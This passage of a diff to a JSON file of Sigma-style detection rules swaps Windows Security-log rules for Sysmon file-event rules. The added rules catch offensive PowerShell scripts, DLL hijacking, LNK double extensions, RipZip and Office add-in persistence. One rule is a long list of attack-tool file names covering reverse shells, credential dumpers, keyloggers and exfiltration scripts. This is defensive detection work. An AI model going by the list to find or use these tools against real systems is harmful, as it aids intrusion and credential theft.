'%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", - "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential Initial Access via DLL Search Order Hijacking", + "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "status": "experimental", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "author": "Tim Rauch (rule), Elastic (idea)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR Image LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR Image LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" }, { - "title": "Possible DC Shadow Attack", - "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "title": "Suspicious LNK Double Extension Files", + "id": "3215aa19-f060-4332-86d5-5602511f3ca8", "status": "experimental", - "description": "Detects DCShadow via create new SPN", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.credential_access", - "attack.t1207" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Valid on domain controllers; exclude known DCs" + "Users creating a shortcut on e.g. desktop" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" ], - "filename": "win_security_possible_dc_shadow.yml" + "filename": "file_event_win_susp_lnk_double_extension.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", - "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "status": "experimental", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Faulty legacy applications" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "title": "Creation of a Diagcab", + "id": "3d0ed417-3d94-4963-a562-4a92c940656a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "author": "frack113", + "tags": [ + "attack.resource_development" + ], + "falsepositives": [ + "Legitimate microsoft diagcab" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.diagcab' ESCAPE '\\')" + ], + "filename": "file_event_win_susp_diagcab.yml" + }, + { + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' 